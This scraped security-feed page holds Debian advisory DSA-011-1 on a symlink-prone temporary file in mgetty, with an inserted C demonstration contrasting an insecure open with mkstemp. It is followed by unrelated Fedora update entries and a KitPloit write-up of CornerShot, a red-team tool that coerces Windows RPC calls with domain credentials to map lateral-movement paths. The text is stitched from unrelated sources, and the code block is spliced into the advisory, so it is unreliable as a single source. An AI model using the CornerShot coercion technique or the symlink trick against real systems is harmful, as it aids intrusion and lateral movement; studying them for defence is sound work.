[SECURITY] [DSA-011-1] New version of mgetty released
2001-01-10T00:00:00
ID: DEBIAN:DSA-011-1:E329E | Type: debian | Reporter: Debian | Modified: 2001-01-10T00:00:00
Description
Debian Security Advisory DSA-011-1 security@debian.org
http://www.debian.org/security/ Michael Stone
January 10, 2001
Package: mgetty
Vulnerability: insecure tempfile
Debian-specific: no
Immunix reports that mgetty does not create temporary files in a secure
manner, which could lead to a symlink attack. This has been corrected
in mgetty 1.1.21-3potato1.
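As an added illustration of the defect class this advisory names (temporary files created under a predictable name so that a planted symlink can redirect the write), the C example below is not mgetty's code and not part of the advisory. It contrasts an open(2) of a predictable name without O_EXCL with mkstemp(3) followed by an fstat(2) check on the descriptor, running inside a private directory made with mkdtemp(3). The directory prefix /tmp/dsa011-, the names spool.* and victim, and all function names are constructed for the example.

```c
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700
#endif
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Unsafe pattern (the defect class named in the advisory, not mgetty's actual
 * code): a predictable name in a shared directory, opened with O_CREAT but
 * without O_EXCL, so a symlink already planted at that name is followed and
 * whatever it points at is truncated with the caller's privileges. */
int open_tmp_insecure(const char *dir, char *path, size_t len)
{
    snprintf(path, len, "%s/spool.%ld", dir, (long)getpid());
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened pattern: mkstemp(3) creates the file with O_CREAT|O_EXCL under an
 * unpredictable name, so it never reuses an existing path, and fstat(2) on the
 * returned descriptor (not stat on the name, which would race) confirms a
 * regular file we own with a single link before it is used. */
int open_tmp_secure(const char *dir, char *path, size_t len)
{
    struct stat st;
    int fd;

    snprintf(path, len, "%s/spool.XXXXXX", dir);
    fd = mkstemp(path);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != geteuid() || st.st_nlink != 1) {
        close(fd);
        unlink(path);
        return -1;
    }
    return fd;
}

/* Constructed setup: a private directory plus a "victim" file of 8 bytes. */
static int setup(char *dir, char *victim, size_t len)
{
    int fd;
    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(victim, len, "%s/victim", dir);
    fd = open(victim, O_WRONLY | O_CREAT, 0600);
    if (fd < 0)
        return -1;
    if (write(fd, "keep me\n", 8) != 8) {
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}

/* Returns 1 if open_tmp_insecure followed a symlink planted at its predictable
 * name and emptied the victim, 0 if the victim survived, -1 on setup failure. */
int insecure_follows_symlink(void)
{
    char dir[] = "/tmp/dsa011-XXXXXX";
    char victim[256], path[256] = "";
    struct stat st;
    int fd = -1, result = -1;

    if (setup(dir, victim, sizeof victim) == 0) {
        /* Constructed: the link already sits at the name the opener computes. */
        snprintf(path, sizeof path, "%s/spool.%ld", dir, (long)getpid());
        if (symlink(victim, path) == 0) {
            fd = open_tmp_insecure(dir, path, sizeof path);
            result = (stat(victim, &st) == 0 && st.st_size == 0) ? 1 : 0;
        }
        unlink(path);
        unlink(victim);
    }
    if (fd >= 0)
        close(fd);
    rmdir(dir);
    return result;
}

/* Returns 1 if open_tmp_secure yields a fresh regular file while the victim
 * keeps its 8 bytes, 0 otherwise, -1 on setup failure. */
int secure_leaves_victim_intact(void)
{
    char dir[] = "/tmp/dsa011-XXXXXX";
    char victim[256], path[256] = "";
    struct stat st;
    int fd = -1, result = -1;

    if (setup(dir, victim, sizeof victim) == 0) {
        fd = open_tmp_secure(dir, path, sizeof path);
        result = (fd >= 0 && stat(victim, &st) == 0 && st.st_size == 8) ? 1 : 0;
        unlink(path);
        unlink(victim);
    }
    if (fd >= 0)
        close(fd);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("insecure open followed planted symlink: %d\n", insecure_follows_symlink());
    printf("secure open left victim intact: %d\n", secure_leaves_victim_intact());
    return 0;
}
```

On Linux both checks print 1: the insecure opener truncates the victim through the link, while the hardened opener cannot be pointed at a pre-existing path because it never opens a name that already exists. The ownership and link-count check is done with fstat on the descriptor rather than stat on the name, since a stat-then-open sequence would reintroduce the same race the advisory describes.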
We recommend you upgrade your mgetty package immediately.
wget url
    will fetch the file for you
dpkg -i file.deb
    will install the referenced file.
You may use an automated update by adding the resources from the
footer to the proper configuration.
Debian GNU/Linux 2.2 alias potato
Potato was released for the alpha, arm, i386, m68k, powerpc and sparc
architectures.
These files will be moved into
ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon.
For not yet released architectures please refer to the appropriate
directory ftp://ftp.debian.org/debian/dists/sid/binary-$arch/ .
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
{"id": "DEBIAN:DSA-011-1:E329E", "bulletinFamily": "unix", "title": "[SECURITY] [DSA-011-1] New version of mgetty released", "description": "- ----------------------------------------------------------------------------\nDebian Security Advisory DSA-011-1 security@debian.org\nhttp://www.debian.org/security/ Michael Stone\nJanuary 10, 2001\n- ----------------------------------------------------------------------------\n\nPackage: mgetty\nVulnerability: insecure tempfile\nDebian-specific: no\n\nImmunix reports that mgetty does not create temporary files in a secure\nmanner, which could lead to a symlink attack. This has been corrected \nin mgetty 1.1.21-3potato1\n\nWe recommend you upgrade your mgetty package immediately.\n\nwget url\n\twill fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 2.2 alias potato\n- ------------------------------------\n\n Potato was released for the alpha, arm, i386, m68k, powerpc and sparc\n architectures.\n\n Source archives:\n http://security.debian.org/debian-security/dists/stable/updates/main/source/mgetty_1.1.21-3potato1.diff.gz\n MD5 checksum: 7fa9561fad8dbe7a4a288c8135b33174\n http://security.debian.org/debian-security/dists/stable/updates/main/source/mgetty_1.1.21-3potato1.dsc\n MD5 checksum: 0d4b5d68d1bb236970e1fe5f6ae02264\n http://security.debian.org/debian-security/dists/stable/updates/main/source/mgetty_1.1.21.orig.tar.gz\n MD5 checksum: 41b23fb60b123a25179067bb0711b935\n\n Architecture-independent files:\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-all/mgetty-docs_1.1.21-3potato1_all.deb\n MD5 checksum: c406e21ea10a22497b4f8d6a0473b537\n\n Alpha architecture:\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-alpha/mgetty-fax_1.1.21-3potato1_alpha.deb\n MD5 checksum: 835087610bd00ccd5a40e01936e61bb2\n 
http://security.debian.org/debian-security/dists/stable/updates/main/binary-alpha/mgetty-viewfax_1.1.21-3potato1_alpha.deb\n MD5 checksum: e2958b3b698687bfc9de34742c1b90b6\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-alpha/mgetty-voice_1.1.21-3potato1_alpha.deb\n MD5 checksum: 1c0981919bca639e309799d9e532b2d6\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-alpha/mgetty_1.1.21-3potato1_alpha.deb\n MD5 checksum: d838cb1009a5925ced1c92411b013ffc\n\n ARM architecture:\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-arm/mgetty-fax_1.1.21-3potato1_arm.deb\n MD5 checksum: 1cf2e00618425cec1dd76dde1515f6c9\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-arm/mgetty-viewfax_1.1.21-3potato1_arm.deb\n MD5 checksum: dfd5bb2c08ec7fc06518f8df29c0df97\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-arm/mgetty-voice_1.1.21-3potato1_arm.deb\n MD5 checksum: c8b9477a35b82f439b37bff1147aad93\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-arm/mgetty_1.1.21-3potato1_arm.deb\n MD5 checksum: 9a06b9274f595c849e7ffc40ec902e33\n\n Intel ia32 architecture:\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-i386/mgetty-fax_1.1.21-3potato1_i386.deb\n MD5 checksum: fc841c1e78fa0d3347115cf8a50d63cf\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-i386/mgetty-viewfax_1.1.21-3potato1_i386.deb\n MD5 checksum: 57992604cc9437ce1b3362f8e05403ab\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-i386/mgetty-voice_1.1.21-3potato1_i386.deb\n MD5 checksum: 14f6f890c3595c020508b936204fa177\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-i386/mgetty_1.1.21-3potato1_i386.deb\n MD5 checksum: 52c203e583636f32389244c851823afa\n\n Motorola 680x0 architecture:\n not yet available\n\n PowerPC architecture:\n not yet 
available\n\n Sun Sparc architecture:\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-sparc/mgetty-fax_1.1.21-3potato1_sparc.deb\n MD5 checksum: 5fcec09109acc945db8612710ab87e9d\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-sparc/mgetty-viewfax_1.1.21-3potato1_sparc.deb\n MD5 checksum: 4e2a6603b8d11c495d519dec3ad2946d\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-sparc/mgetty-voice_1.1.21-3potato1_sparc.deb\n MD5 checksum: f4203cbdba33a85f05b63e5883887af4\n http://security.debian.org/debian-security/dists/stable/updates/main/binary-sparc/mgetty_1.1.21-3potato1_sparc.deb\n MD5 checksum: 02bd00238010590cb9a4e73d8122f2f7\n\n These files will be moved into\n ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon.\n\nFor not yet released architectures please refer to the appropriate\ndirectory ftp://ftp.debian.org/debian/dists/sid/binary-$arch/ .\n\n- ----------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "published": "2001-01-10T00:00:00", "modified": "2001-01-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2001/msg00000.html", "reporter": "Debian", "references": [], "cvelist": [], "type": "debian", "lastseen": "2018-10-16T22:14:45", "edition": 1, "viewCount": 1, "enchantments": {"score": {"value": 4.3, "vector": "NONE", "modified": "2018-10-16T22:14:45", "rev": 2}, "dependencies": {"references": [{"type": "symantec", "idList": ["SMNTC-111398"]}, {"type": "redhat", "idList": ["RHSA-2020:1485"]}, {"type": "mssecure", "idList": ["MSSECURE:82D3580754DA96FD93831A7833D47D62"]}, 
{"type": "carbonblack", "idList": ["CARBONBLACK:90DD0AABBC88137103AF5EBE0BC139D7"]}, {"type": "atlassian", "idList": ["ATLASSIAN:JRASERVER-70929"]}, {"type": "akamaiblog", "idList": ["AKAMAIBLOG:04DFB64876C2018B4C8089BDBC359066"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2020:0541-1"]}, {"type": "kitploit", "idList": ["KITPLOIT:2480263761626163644"]}, {"type": "schneier", "idList": ["SCHNEIER:7771A7F05A95A96025A02D48BA85B7D1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:BCA35B2D5B3E7432E316ECDF7499D8CD", "TALOSBLOG:B6094C89CA7BC27EB70317743B95A344"]}, {"type": "cve", "idList": ["CVE-2020-11930", "CVE-2020-11928"]}, {"type": "ubuntu", "idList": ["USN-4331-1"]}, {"type": "exploitdb", "idList": ["EDB-ID:48348", "EDB-ID:48346"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310143735", "OPENVAS:1361412562311220201511", "OPENVAS:1361412562311220201509", "OPENVAS:1361412562310143731"]}], "modified": "2018-10-16T22:14:45", "rev": 2}, "vulnersScore": 4.3}, "affectedPackage": []}
{"fedora": [{"lastseen": "2021-02-27T00:37:17", "bulletinFamily": "unix", "cvelist": [], "description": "Rygel is a home media solution that allows you to easily share audio, video and pictures, and control of media player on your home network. In technical te rms it is both a UPnP AV MediaServer and MediaRenderer implemented through a pl ug-in mechanism. Interoperability with other devices in the market is achieved by conformance to very strict requirements of DLNA and on the fly conversion of media to format that client devices are capable of handling. ", "modified": "2021-02-26T23:55:41", "published": "2021-02-26T23:55:41", "id": "FEDORA:E4F3830B1D04", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: rygel-0.40.1-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": [], "description": "The libpq package provides the essential shared library for any PostgreSQL client program or interface. You will need to install this package to use any other PostgreSQL package or any clients that need to connect to a PostgreSQL server. ", "modified": "2021-02-26T01:10:06", "published": "2021-02-26T01:10:06", "id": "FEDORA:A99C730CC0D3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: libpq-12.6-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14349", "CVE-2020-14350", "CVE-2020-25694", "CVE-2020-25695", "CVE-2020-25696"], "description": "PostgreSQL is an advanced Object-Relational database management system (DBM S). The base postgresql package contains the client programs that you'll need to access a PostgreSQL DBMS server, as well as HTML documentation for the whole system. These client programs can be located on the same machine as the PostgreSQL server, or on a remote machine that accesses a PostgreSQL server over a network connection. 
The PostgreSQL server can be found in the postgresql-server sub-package. ", "modified": "2021-02-26T01:10:06", "published": "2021-02-26T01:10:06", "id": "FEDORA:E148330CC0ED", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: postgresql-12.6-1.fc33", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20206"], "description": "This package contains common configuration files and documentation for cont ainer tools ecosystem, such as Podman, Buildah and Skopeo. It is required because the most of configuration files and docs come from p rojects which are vendored into Podman, Buildah, Skopeo, etc. but they are not pack aged separately. ", "modified": "2021-02-26T01:09:46", "published": "2021-02-26T01:09:46", "id": "FEDORA:4044C30CB118", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: containers-common-1-4.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20206"], "description": "podman (Pod Manager) is a fully featured container engine that is a simple daemonless tool. podman provides a Docker-CLI comparable command line that eases the transition from other container engines and allows the management of pods, containers and images. Simply put: alias docker=3Dpodman. Most podman commands can be run as a regular user, without requiring additional privileges. podman uses Buildah(1) internally to create container images. Both tools share image (not container) storage, hence each can use or manipulate images (but not containers) created by the other. 
Manage Pods, Containers and Container Images podman Simple management tool for pods, containers and images ", "modified": "2021-02-26T01:09:46", "published": "2021-02-26T01:09:46", "id": "FEDORA:578F330CA03E", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: podman-3.0.1-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-20206"], "description": "Command line utility to inspect images and repositories directly on Docker registries without the need to pull them ", "modified": "2021-02-26T01:09:46", "published": "2021-02-26T01:09:46", "id": "FEDORA:6F355304C5CD", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: skopeo-1.2.2-1.fc33", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-27135"], "description": "The xterm program is a terminal emulator for the X Window System. It provides DEC VT102 and Tektronix 4014 compatible terminals for programs that can't use the window system directly. ", "modified": "2021-02-26T01:09:41", "published": "2021-02-26T01:09:41", "id": "FEDORA:727393060988", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 33 Update: xterm-366-1.fc33", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": [], "description": "The libpq package provides the essential shared library for any PostgreSQL client program or interface. You will need to install this package to use any other PostgreSQL package or any clients that need to connect to a PostgreSQL server. 
", "modified": "2021-02-26T01:09:39", "published": "2021-02-26T01:09:39", "id": "FEDORA:7C2433052DBB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: libpq-12.6-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": [], "description": "PostgreSQL is an advanced Object-Relational database management system (DBM S). The base postgresql package contains the client programs that you'll need to access a PostgreSQL DBMS server, as well as HTML documentation for the whole system. These client programs can be located on the same machine as the PostgreSQL server, or on a remote machine that accesses a PostgreSQL server over a network connection. The PostgreSQL server can be found in the postgresql-server sub-package. ", "modified": "2021-02-26T01:09:39", "published": "2021-02-26T01:09:39", "id": "FEDORA:A78113052BB8", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: postgresql-12.6-1.fc32", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T04:34:17", "bulletinFamily": "unix", "cvelist": ["CVE-2021-23336", "CVE-2021-3177"], "description": "Python 3.7 package for developers. This package exists to allow developers to test their code against an older version of Python. This is not a full Python stack and if you wish to run your applications with Python 3.7, see other distributions that support it, such as an older Fedora release. 
", "modified": "2021-02-26T01:09:33", "published": "2021-02-26T01:09:33", "id": "FEDORA:764EE30C99A3", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 32 Update: python37-3.7.10-1.fc32", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "kitploit": [{"lastseen": "2021-02-27T03:29:49", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-8sb2d52Q60Y/YDSVjvlYggI/AAAAAAAAVcI/utnseqOhDSY4I40-ovKhZsm9xhJyGpqjACNcBGAsYHQ/s1591/cornershot_1_csdemo.gif>)\n\n \n\n\nIn warfare, CornerShot is a weapon that allows a soldier to look past a corner (and possibly take a shot), without risking exposure. Similarly, the CornerShot package allows one to look at a remote host\u2019s network access without the need to have any special privileges on that host. \n\nUsing CornerShot, a ** source ** , with network access to ** carrier ** , can determine whether there is network access between the ** carrier ** and ** target ** for a specific port ** p ** . \n\n \n\n\nFor example, let's assume an red team is trying to propagate from a \"compromised\" source host A, to a target host X, for which host A has no access to. If they propagate through host B, only then they will discover that there is not network access between host B and X. \n\nBy using CornerShot, the team can discover that host C actually has access to target X, so propagation towards target X should go through host C first. \n \n \n +-----+ +-----+ +-----+ \n | | | | filtered | | \n | A +--------> B +----X--->(p) X | \n | | | | | | \n +-----+ +-----+ +-(p)-+ \n source carrier target \n + ^ \n | | \n | +-----+ | \n | | | open | \n +---------->+ C +-------------+ \n | | \n +-----+ \n \n \n \n\nSimilarly to [ nmap ](<https://nmap.org/> \"nmap\" ) , CornerShot differentiates between the following state of ports: _ open _ , _ closed _ , _ filtered _ and _ unknown _ (if it can't be determined). 
\n\nThe following demo shows running CornerShot against two carriers hosts 172.0.1.12 & 172.0.1.13, in order to determine if the have network access to 192.168.200.1: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-3J0lPVG9-cc/YDSVtxT_s3I/AAAAAAAAVcM/wXtXwK7InNcg0mThcm_9PWpulg86COtzQCNcBGAsYHQ/s1591/cornershot_1_csdemo.gif>)\n\nRead more [ here ](<https://zeronetworks.com/blog/adversary-resilience-via-least-privilege-networking-part-1/> \"here\" ) . \n\n \n** Use Cases ** \n \n** Single Deployment for Complete Network Visibility ** \n\n\nThe seemingly simple task of identifying if some host B in the network has access to host C may require large deployment of network sensors, device agents or collection of a multitude of firewall rules, router configurations and host policies. \n\nCornerShot can simplify this process by using one (or very few) agents that can query other hosts in the network, to determine their access to remote hosts. \n\n \n** Validate [ BloodHound ](<https://www.kitploit.com/search/label/BloodHound> \"BloodHound\" ) Paths ** \n\n\nSecurity teams that utilize BloodHound to find, and mitigate, [ privilege escalation ](<https://www.kitploit.com/search/label/Privilege%20Escalation> \"privilege escalation\" ) paths inside their network, often struggle with millions of logical paths discovered by BloodHound. \n\n[ ShotHound ](<https://github.com/zeronetworks/BloodHound-Tools/tree/main/ShotHound> \"ShotHound\" ) is a tool that integrated CornerShot with BloodHound, in order to discover practical paths that are supported by network access. \n\n \n** Getting Started ** \n\n\nCornerShot can be used as a package, or as a standalone module. The only [ requirements ](<https://www.kitploit.com/search/label/Requirements> \"requirements\" ) are Python 3 and the impacket package. 
\n\n \n** Installation ** \n\n \n \n pip install cornershot\n\n \n** Standalone Usage ** \n\n\nBasic usage requires [ credentials ](<https://www.kitploit.com/search/label/Credentials> \"credentials\" ) from a valid domain user, a FQDN domain, a carrier IP and target IP. \n \n \n python -m cornershot <user> <password> <domain> <carrier> <target>\n\nTo scan a range of carriers against a range of targets, subnets or IP ranges may be used in a comma delimited list: \n \n \n python -m cornershot <user> <password> <domain> 192.168.1.10-192.168.1.20 192.168.5.0/24,192.168.6.0/24\n\nBy default, CornerShot will try to scan the following ports: 135, 445, 3389, 5985, 5986. The user can provide a comma delimited list of ports and port ranges: \n \n \n python -m cornershot -tp 22,8080,45000-45005 <user> <password> <domain> <carrier> <target>\n\n \n** As a Package ** \n\n\nWithin code, one needs to instantiate a CornerShot object with the username, password and domain name of a valid domain user. Adding carriers, target and ports is achieved via the _ add_shots _ method. Once ready, the _ open_fire _ method can be called, which performs only the relevant RPC calls based on the required ports. \n \n \n from cornershot import CornerShot \n cs = CornerShot(\"username\", \"password\", \"fqdn\") \n cs.add_shots(carriers=[\"192.168.1.1\"],targets=[\"192.168.1.2\",\"192.168.1.3\"]) \n results = cs.open_fire()\n\nThe result of _ open_fire _ is a dictionary with keys of carriers, each carrier has another set of keys for targets, and finally, each target holds a dictionary of ports and their respective states. 
This is an example format of a result: \n \n \n {'carrier_1': \n \t{'target_1': \n \t\t{135: 'unknown', 445: 'filtered', 3389: 'filtered', 5986: 'filtered', 5985: 'filtered'}, \n \t'target_2': \n \t\t{135: 'unknown', 445: 'open', 5985: 'unknown', 5986: 'filtered', 3389: 'open'} \n \t}, \n 'carrier_2': \n \t{'target_1': \n \t\t{3389: 'filtered', 135: 'filtered', 5985: 'filtered', 445: 'filtered', 5986: 'unknown'}, \n \t'target_2': \n \t\t{5985: 'filtered', 5986: 'filtered', 445: 'filtered', 135: 'filtered', 3389: 'open'} \n \t} \n }\n\n \n** How CornerShot Works? ** \n\n\nCornerShot relies on various, well documented, standard Remote Procedure Call (RPC) methods that are used by various Microsoft services. By using methods that only require an authenticated account in the domain, CornerShot is able to trigger network traffic from a carrier host to a target. \n\nCornerShot is able to determine the remote's port state by measuring the time an RPC call took, and using different error codes for each RPC method. \n\n \n** RPC Methods ** \n\n\nThe reader may be familiar with the [ \"printer bug\" ](<https://www.slideshare.net/harmj0y/derbycon-the-unintended-risks-of-trusting-active-directory/41> \"printer bug\" ) , which was discovered by [ Lee Christensen ](<https://twitter.com/tifkin_> \"Lee Christensen\" ) . While it is called a bug, it is a well documented behaviour of the printing service, which allows any authenticated user to coerce a remote server to authenticate to any machine, using the [ RpcRemoteFindFirstPrinterChangeNotificationEx ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/eb66b221-1c1f-4249-b8bc-c5befec2314d> \"RpcRemoteFindFirstPrinterChangeNotificationEx\" ) method. 
\n\nCornerShot utilizes the following RPC methods from several Microsoft protocols (there are many additional methods, which will be implemented in future versions): \n\n * RPRN : [ RpcOpenPrinter ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/989357e2-446e-4872-bb38-1dce21e1313f> \"RpcOpenPrinter\" )\n * RRP : [ BaseRegSaveKey ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/f022247d-6ef1-4f46-b195-7f60654f4a0d> \"BaseRegSaveKey\" )\n * EVEN : [ ElfrOpenBELW ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-even/4db1601c-7bc2-4d5c-8375-c58a6f8fc7e1> \"ElfrOpenBELW\" )\n * EVEN6 : [ EvtRpcOpenLogHandle ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-even6/30a294b1-4e95-468a-a90a-185a5ea63ea0> \"EvtRpcOpenLogHandle\" )\n\nImplementation of the protocols themselves is achieved via the wonderful [ impacket ](<https://github.com/SecureAuthCorp/impacket> \"impacket\" ) package. \n\n \n** RpcOpenPrinter ** \n\n\nThis method receives a [ printerName ](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/24fcd124-035c-4988-a858-3a7d8d6f7b43> \"printerName\" ) as parameter. The printerName name can be a path to a local file, a remote file or even to a web printer. By supplying a name that conforms with the WEB_PRINT_SERVER format, it is possible to query any remote port. One example of a web print server name which will trigger HTTP traffic to a remote host and port is: \"http://<target_ip>:<target_port>/printers/ppp/.printer\". \n\n \n** BaseRegSaveKey ** \n\n\nTo utilize this method, we need a two step approach: first, open a [ registry key ](<https://www.kitploit.com/search/label/Registry%20Key> \"registry key\" ) on the remote host - which results with a valid handle, and second, try and save a backup of this handle to a remote file. 
The BaseRegSaveKey method receives a file path to which it can save a backup of a registry, which triggers SMB traffic over port 445 (and 135 as backup) to a target. The registry key CornerShot opens is the HKEY_CURRENT_USER, which is open for reading by default on most client hosts. \n\n \n** ElfrOpenBELW ** \n\n\nThis function tries to backup Windows events into a file path, which can be remote - in such a case the service will try and access the remote host and path. \n\n \n** EvtRpcOpenLogHandle ** \n\n\nSimilarly to the EVEN method, only this method utilizes a different version of the Windows Events protocol, which is done directly over TCP - no need for SMB port to be open. \n\n \n** Determining Port State ** \n\n\nCornerShot estimates the remote ports' state based on timing factors and error messages received by the RPC method or underlying transport. By experimenting with different Windows hosts and various RPC protocols, we came up with 3 different timing thresholds that prove to work in most network environments. These thresholds are best illustrated with the following figure: \n \n \n + + + \n | | | \n unknown | open / closed | filtered | open \n / | | | \n open | | | \n | | | \n +-------------+------------------+-----------------+--------------+ \n 0 0.5 20 40 Seconds \n MIN FILTERED UPPER \n \n\nThe MIN threshold is 0.5 seconds, responses below this threshold either mean an error in the underlying RPC method or underlying transport, or a response could have been received from the target host. \n\nReplies below FILTERED threshold of 20 seconds could indicate either an open or a closed port, depending on the type of error message received for the method. \n\nReplies between the FILTERED and UPPER threshold of 40 seconds indicate a filtered port for all tested methods (so far...). And requests taking more than the UPPER limit indicate a prolonged open TCP connection. 
\n\n \n** OS support ** \n\n\nExecuting Corenershot against different OS versions and configurations will yield different results. Not all Windows versions have the same named pipes or behave the same when queried with the same RPC method. Most Windows OOTB will not expose SMB and other RPC services over the network, however, experience has shown that in large environments these ports tend to be open and accessible for most of the assets. \n\nThe following table shows default support for various RPC protocols, given that the appropriate ports are accessible to the carrier host and no configuration changes were made to the host: \n\nOS | Supported RPC Protocols | Required Open Carrier Ports | Possible Target Ports to Scan \n---|---|---|--- \nWindows 7 | EVEN,EVEN6 | 445 / 135 & even6 tcp port | 445* \nWindows 8 | EVEN,EVEN6 | 445 / 135 & even6 tcp port | 445* \nWindows 10 | EVEN,EVEN6,RPRN | 445 / 135 & even6 tcp port | ** ANY ** \nServer 2008 | EVEN,EVEN6,RRP,RPRN** | 445 / 135 & even6 tcp port | 445 \nServer 2012 | EVEN,EVEN6,RRP,RPRN** | 445 / 135 & even6 tcp port | 445 \nServer 2016 | EVEN,EVEN6,RRP,RPRN** | 445 / 135 & even6 tcp port | 445 \nServer 2019 | EVEN,EVEN6,RRP,RPRN** | 445 / 135 & even6 tcp port | 445 \n \n* If Webclient service is running on a client machine, additional ports can be scanned. Currently CornerShot does not support this option. \n\n** RPRN protocol is supported on server hosts, however opening a remote web printer does not work (which is why we can't scan ANY target port) - until we find a workaround \n\n\uf609 \n\n \n** Developers ** \n\n\nAdditional RPC shots, or any other contribution is welcome! \n\nAll RPC methods are implemented under _ /shots _ , and inherit from an abstract class named _ BaseRPCShot _ . The _ /example _ folder shows how to create a custom RPC shot and use it in code. \n\n \n** Contact Us ** \n\n\nWe are happy to hear from you! 
For bugs, patches, suggestions on this package, please contact us at [email protected] \n\n \n \n\n\n** [ Download Cornershot ](<https://github.com/zeronetworks/cornershot> \"Download Cornershot\" ) **\n", "edition": 1, "modified": "2021-02-26T20:30:10", "published": "2021-02-26T20:30:10", "id": "KITPLOIT:296453770118336339", "href": "http://www.kitploit.com/2021/02/cornershot-amplify-network-visibility.html", "title": "CornerShot - Amplify Network Visibility From Multiple POV Of Other Hosts", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-02-26T19:39:33", "bulletinFamily": "tools", "cvelist": [], "description": "[  ](<https://1.bp.blogspot.com/-hl1ui4DNJnI/YDSUvQ6K-8I/AAAAAAAAVcA/1CJUslQwoAQQGiG45ItDg229cvNM7nXOgCNcBGAsYHQ/s787/wifi.png>)\n\n \n\n\nAn open source implementation of the grantor role in Apple's Wi-Fi Password Sharing protocol. \n\n \n** Disclaimer ** \n\n\nOpenWifiPass is experimental software and is the result of reverse engineering efforts by the [ Open Wireless Link ](<https://owlink.org> \"Open Wireless Link\" ) project. The code serves solely documentary and educational purposes. It is _ untested _ and _ incomplete _ . For example, the code ** does not verify the identity of the requestor ** . So, do not use this implementation with sensitive Wi-Fi credentials. OpenWifiPass is not affiliated with or endorsed by Apple Inc. 
